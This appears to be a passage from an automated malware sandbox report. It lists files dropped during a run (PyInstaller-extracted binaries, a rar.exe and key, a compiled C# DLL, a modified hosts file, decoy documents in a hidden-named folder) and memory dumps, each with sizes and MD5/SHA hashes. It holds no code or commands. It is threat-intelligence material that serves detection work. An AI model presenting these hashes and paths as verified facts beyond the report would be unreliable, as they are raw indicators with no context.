SHA1
dcd2d3d14e06da3e8d7dc91a69b5fd785768b5fe

SHA256
9fcb5ad15bd33dd72122a171a5d950e8e47ceda09372f25df828010cde24b8ed

SHA512
4b790046787e57b9414a796838a026b1530f497a75c8e62d62b56f8c16a0cbedbefad3d4be957bc18379f64374d8d3bf62d3c64b53476c7c5005a7355acd2cee

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\select.pyd

Filesize
24KB

MD5
666358e0d7752530fc4e074ed7e10e62

SHA1
b9c6215821f5122c5176ce3cf6658c28c22d46ba

SHA256
6615c62fa010bfba5527f5da8af97313a1af986f8564277222a72a1731248841

SHA512
1d3d35c095892562ddd2868fbd08473e48b3bb0cb64ef9ccc5550a06c88dda0d82383a1316b6c5584a49ca28ed1ef1e5ca94ec699a423a001ccd952bd6bd553d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\sqlite3.dll

Filesize
608KB

MD5
bd2819965b59f015ec4233be2c06f0c1

SHA1
cff965068f1659d77be6f4942ca1ada3575ca6e2

SHA256
ab072d20cee82ae925dae78fd41cae7cd6257d14fd867996382a69592091d8ec

SHA512
f7758bd71d2ad236bf3220db0ad26f3866d9977eab311a5912f6e079b59fa918735c852de6dbf7b5fee9e04124bc0cd438c4c71edc0c04309330108ba0085d59

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28682\unicodedata.pyd

Filesize
287KB

MD5
7a462a10aa1495cef8bfca406fb3637e

SHA1
6dcbd46198b89ef3007c76deb42ab10ba4c4cf40

SHA256
459bca991fcb88082d49d22cc6ebffe37381a5bd3efcc77c5a52f7a4bb3184c0

SHA512
d2b7c6997b4bd390257880a6f3336e88d1dd7159049811f8d7c54e3623e9b033e18e8922422869c81de72fc8c10890c173d8a958d192dd03bfc57cffaea1ac7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xxo053tr.ozn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\zurj41tt\zurj41tt.dll

Filesize
4KB

MD5
3ff70f4731205777d320a6ee76a485ed

SHA1
53da45574430e16da3191da1e1392533e3296a9f

SHA256
6ed51b1d0318ee8a24ff11f42042bb1908410cf528e995e656aea8093d393726

SHA512
b0eb8d5bacc60cdc1627f0d20274d6b4975b19d7592edc69490b0d325d57635d0ba47efbae28bd5511c7b00787008bb718579b96575559dbe9f163d3abc36c49

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Desktop\DismountUnlock.pdf

Filesize
654KB

MD5
98d898fa362cb0fc54c250efa485e5b4

SHA1
4d761e24539c7fc8c61a31a21bd2b0e42a3c5cce

SHA256
536401e22ec6f9f2ac8929a2808ec500e7bd9f16ae94bf2cf5792883a913d2fc

SHA512
e87050b0b9276a2cb4d4967f88a72f6a38ac1391482a2cf698548dd3200aac7e153cf79cc4e95d089882a092444a87fe81ebf316b7c6e321cb5c79ccdf536593

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Desktop\OpenTest.jpg

Filesize
487KB

MD5
8f2f605606e04049b4e35e2d70d4c7b4

SHA1
f0640caeb9e698e8714266d0518097aa44b05bc6

SHA256
fa1cbf4b85b454196f03078dcf213d0d397b28a85b4c5c6731e080ae643a8607

SHA512
4fb4d4731e86782019cc188e6240422e8b895078c252220f862a80b5a01b5ea915f94c80fd5f2585fac98c236e52c2404dbed913d4ce68c04b7e045b6d318da6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Desktop\OutTest.xlsx

Filesize
13KB

MD5
8ec19319f5b6e591a595cd24ad3e2463

SHA1
d4f1b0fec1fea72ea9dd5cc564b696dd84bf4406

SHA256
274b1921c79ab15046f9bed54f579b1b5fc9a796c67af0c0b50afe514021864b

SHA512
fec4bc66334fd85c6280f84f313440cacc1d8528789a3622fc35c9b3764d43441a0ea482961c6d00850136e5e262196bcc2c25d056ade3c0e1bf68ab9bacae13

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Desktop\ReadTest.xlsx

Filesize
11KB

MD5
61fa91c3e41961c2132af1c412008025

SHA1
35fee0491d428101e61380a53a37e2d743cb3694

SHA256
2058f6ecad119c33a8fee49498fa4e856acc2014caf2b2137ba84518401bdc6b

SHA512
fdbd80de945bb285d6e4303ebabb0293d013fa19ae898b513ea258cb1ecca9d2b341452e6157d74bd95b54eb8a032338f0b5abab17a747a0c5e315f8608502ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Desktop\RenameNew.xlsx

Filesize
10KB

MD5
893166787fe0a9c107a69eb555dd15b9

SHA1
162e1f787072466025fb4e74682e3dca52c8dfaf

SHA256
3260f1a01d5c4300bbbb163dc0573da59e9d806a9ca19e8bb5d3968a3008a45f

SHA512
8cfe1e526434fad098edc985c15ab38b59f85130196fa89d0fd12f6f8f66de24e7c493bff7d33ea53b64120c1ec5da77bd8d2627996ab8d276d269cb48b1c9ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Desktop\ResizeSwitch.doc

Filesize
431KB

MD5
f097d4ac6e30b013b607d0f636349a4b

SHA1
b7c2c133cf8cf44b1433f62515568978cebd98fa

SHA256
eb66c87108352bd16a2c9e44df90966a89ccec5385761d08daa3cf7463a9cac4

SHA512
751dce83a935b135e3c4b0fc458fae42ef89acc8d78c7fa04c8a65c917517b3a16e7437a7a4a36260e8ddfad81188cd0cac33b93b9180bfaf8a7753fcceff97d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Desktop\RestartNew.png

Filesize
960KB

MD5
5ce40a4da9c324487340742009d6601f

SHA1
610a5be9f39455f5bd35ef837d9e384da4323654

SHA256
99ae5bb4bbddc74964c632bee22aa1943d4d7d2efdfb55c7dbfbd277e20576ba

SHA512
75092f27368320b60e07e060a036238fd7b1f872a5ce2b45287ed7a100c990e6925a4b72ebadb3f3a3844aee85b412532b8b8a98dba2052cdae4a1dea63d9b8d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Desktop\SyncOut.docx

Filesize
14KB

MD5
d42a54daa2806f1455d33f3f2e74b70e

SHA1
6e42738df66d763427d519d3439f282796599784

SHA256
70697bceac1ec4ef67ce7398cb968a195bfbaa4a31d4e185a814b998fec7ae6e

SHA512
cef86ff20f3fbc95fde53bf9e17aa119eab0523d408ee50192e2e77872410b1d7ca7d089c06b3ab6af26f1796bc1a9ffc32d048dbd0433da53d5735ec4d71842

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Documents\BackupHide.html

Filesize
1.2MB

MD5
37c75e96021f338bb9b4495e957dcdc2

SHA1
2ebba7e5efea1a866f00f315eaf4baa1d5cfc089

SHA256
8fd95126e920ceaba0539ba085b7d0b785a028cd22edafd5fd277b20cf60636d

SHA512
28c9784a9947e1a5f335243605129e62c47333ff123f0863309be8a9c5b7ae907668422018fb80584489dd871c0188f8d4131d636bbd96fb609ffbab43b8bc98

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Documents\DebugExit.txt

Filesize
1.4MB

MD5
8a65b4b5b78fa0aa60ba6896b757f57a

SHA1
0f045f98c8cb37d847b35a555777fa9bbdd845c0

SHA256
9a6e52ad1460273ebb530b2ae830fd49ad9155a67b3264923b8fa003a590d0d5

SHA512
7fd609b80945ec0f43cb1c4647ec01cf340b77b6b0bc616faa36109cace791e0b818790853eaafeb4b2612e9c9a1b2883a185c2ed13c2874437df803cc14447d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Documents\EditRename.docx

Filesize
13KB

MD5
4d0431220b59c441ebb6f8a99b3a4c94

SHA1
ccfda93b5cf55245f1c120697ac44df4953075d9

SHA256
27fa063abdcd6e4ff8dcf4d11f241b393a11b67bace0f479aa2d5f7cd7235ce2

SHA512
6ab8d307bbad4097a5e7086287f4bbd5b2e9c216ba699b5ebc7f8b4af8c755a6c7c7c8a526cff5212b747400808b7920bc9dbb7eca97568bc1b889a6f648c691

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Documents\EnableMount.docx

Filesize
18KB

MD5
7f4592244fb33456d5217ec22544e153

SHA1
6a620fff2860599ebe1372a6171f6358f31f9db3

SHA256
83ccca77b840f665de94b1623875a2d7e74aab8cb6f0b1cd1c4c79b8f25723a0

SHA512
902b35125fe8c78428167f1b961392ba78c2ba5aad3e8f313f13ee565fd571e27b1951882efb63e8f7b7872068c464199ed697cba0f32aaf2011a3d60a3a7516

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zurj41tt\CSCF96CA5723B304A5DAEAABF21F7306F.TMP

Filesize
652B

MD5
e986e42e2fd0119a9a360ba92deb6ca7

SHA1
a865dc14c2b610335f357f260639c76a77a0910d

SHA256
af445ffeb081a70a12460ebfe7322410c8a4d4035e5a6d5ce722e273925fe7c6

SHA512
c22b89cc657409a579f263e150016018ef53ab3b4d01a6e2150b337fc2e889be50b01f3f2a8103bd9272b140a43c7c50f0c308d3b0e9ce577f0bd2bd3579d367

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zurj41tt\zurj41tt.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zurj41tt\zurj41tt.cmdline

Filesize
607B

MD5
44b9c7c0cf0f2081ffbf2e59d4c8a70c

SHA1
5a4d7f0a692548e74c5495da7e7346c6994bded4

SHA256
32d5f231ee1f6ae9261f12b3188270bd09071e0aa776ffd1d64f6c66cce1d589

SHA512
15392ae90c49c168a814dcf441a1d1ae7eeeed310eb47fb1738a98041603f612af14dcf1b823257fce4ed60587c19dfcb42c3a6c4ba46ff3425021f2753c252a

Download Submit
memory/548-83-0x000001FA7B760000-0x000001FA7B782000-memory.dmp

Filesize
136KB

Download
memory/548-89-0x00007FFDEE4D0000-0x00007FFDEEF92000-memory.dmp

Filesize
10.8MB

Download
memory/548-82-0x00007FFDEE4D3000-0x00007FFDEE4D5000-memory.dmp

Filesize
8KB

Download
memory/548-95-0x00007FFDEE4D0000-0x00007FFDEEF92000-memory.dmp

Filesize
10.8MB

Download
memory/548-110-0x00007FFDEE4D0000-0x00007FFDEEF92000-memory.dmp

Filesize
10.8MB

Download
memory/4360-219-0x00000298FC240000-0x00000298FC248000-memory.dmp

Filesize
32KB

Download
memory/4536-62-0x00007FFE01A90000-0x00007FFE01AA9000-memory.dmp

Filesize
100KB

Download
memory/4536-58-0x00007FFE03020000-0x00007FFE0303F000-memory.dmp

Filesize
124KB

Download
memory/4536-124-0x00007FFDFE810000-0x00007FFDFE83E000-memory.dmp

Filesize
184KB

Download
memory/4536-48-0x00007FFE07EA0000-0x00007FFE07EAF000-memory.dmp

Filesize
60KB

Download
memory/4536-94-0x00007FFE01A90000-0x00007FFE01AA9000-memory.dmp

Filesize
100KB

Download
memory/4536-56-0x00007FFE058D0000-0x00007FFE058E9000-memory.dmp

Filesize
100KB

Download
memory/4536-80-0x00007FFE03020000-0x00007FFE0303F000-memory.dmp

Filesize
124KB

Download
memory/4536-81-0x00007FFDFE060000-0x00007FFDFE178000-memory.dmp

Filesize
1.1MB

Download
memory/4536-54-0x00007FFDFEAA0000-0x00007FFDFEACD000-memory.dmp

Filesize
180KB

Download
memory/4536-30-0x00007FFDFEAD0000-0x00007FFDFEAF4000-memory.dmp

Filesize
144KB

Download
memory/4536-72-0x000002381B6D0000-0x000002381BA45000-memory.dmp

Filesize
3.5MB

Download
memory/4536-25-0x00007FFDEF320000-0x00007FFDEF78E000-memory.dmp

Filesize
4.4MB

Download
memory/4536-195-0x00007FFDFE180000-0x00007FFDFE238000-memory.dmp

Filesize
736KB

Download
memory/4536-76-0x00007FFE004A0000-0x00007FFE004B4000-memory.dmp

Filesize
80KB

Download
memory/4536-64-0x00007FFE07980000-0x00007FFE0798D000-memory.dmp

Filesize
52KB

Download
memory/4536-66-0x00007FFDFE810000-0x00007FFDFE83E000-memory.dmp

Filesize
184KB

Download
memory/4536-70-0x00007FFDEF320000-0x00007FFDEF78E000-memory.dmp

Filesize
4.4MB

Download
memory/4536-71-0x00007FFDFE180000-0x00007FFDFE238000-memory.dmp

Filesize
736KB

Download
memory/4536-73-0x00007FFDEEFA0000-0x00007FFDEF315000-memory.dmp

Filesize
3.5MB

Download
memory/4536-74-0x00007FFDFEAD0000-0x00007FFDFEAF4000-memory.dmp

Filesize
144KB

Download
memory/4536-226-0x00007FFDEEFA0000-0x00007FFDEF315000-memory.dmp

Filesize
3.5MB

Download
memory/4536-196-0x000002381B6D0000-0x000002381BA45000-memory.dmp

Filesize
3.5MB

Download
memory/4536-78-0x00007FFE06F40000-0x00007FFE06F4D000-memory.dmp

Filesize
52KB

Download
memory/4536-60-0x00007FFDFE240000-0x00007FFDFE3B1000-memory.dmp

Filesize
1.4MB

Download
memory/4536-295-0x00007FFDFEAD0000-0x00007FFDFEAF4000-memory.dmp

Filesize
144KB

Download
memory/4536-303-0x00007FFDFE810000-0x00007FFDFE83E000-memory.dmp

Filesize
184KB

Download
memory/4536-300-0x00007FFDFE240000-0x00007FFDFE3B1000-memory.dmp

Filesize
1.4MB

Download
memory/4536-294-0x00007FFDEF320000-0x00007FFDEF78E000-memory.dmp

Filesize
4.4MB

Download
memory/4536-299-0x00007FFE03020000-0x00007FFE0303F000-memory.dmp

Filesize
124KB

Download
memory/4536-343-0x00007FFDFE060000-0x00007FFDFE178000-memory.dmp

Filesize
1.1MB

Download
memory/4536-353-0x00007FFDFE810000-0x00007FFDFE83E000-memory.dmp

Filesize
184KB

Download
memory/4536-356-0x00007FFE06F40000-0x00007FFE06F4D000-memory.dmp

Filesize
52KB

Download
memory/4536-355-0x00007FFE004A0000-0x00007FFE004B4000-memory.dmp

Filesize
80KB

Download
memory/4536-354-0x00007FFDFE180000-0x00007FFDFE238000-memory.dmp

Filesize
736KB

Download
memory/4536-352-0x00007FFE07980000-0x00007FFE0798D000-memory.dmp

Filesize
52KB

Download
memory/4536-351-0x00007FFE01A90000-0x00007FFE01AA9000-memory.dmp

Filesize
100KB

Download
memory/4536-350-0x00007FFDFE240000-0x00007FFDFE3B1000-memory.dmp

Filesize
1.4MB

Download
memory/4536-349-0x00007FFE03020000-0x00007FFE0303F000-memory.dmp

Filesize
124KB

Download
memory/4536-348-0x00007FFE058D0000-0x00007FFE058E9000-memory.dmp

Filesize
100KB

Download
memory/4536-347-0x00007FFDFEAA0000-0x00007FFDFEACD000-memory.dmp

Filesize
180KB

Download
memory/4536-346-0x00007FFE07EA0000-0x00007FFE07EAF000-memory.dmp

Filesize
60KB

Download
memory/4536-345-0x00007FFDFEAD0000-0x00007FFDFEAF4000-memory.dmp

Filesize
144KB

Download
memory/4536-344-0x00007FFDEEFA0000-0x00007FFDEF315000-memory.dmp

Filesize
3.5MB

Download
memory/4536-329-0x00007FFDEF320000-0x00007FFDEF78E000-memory.dmp

Filesize
4.4MB

Download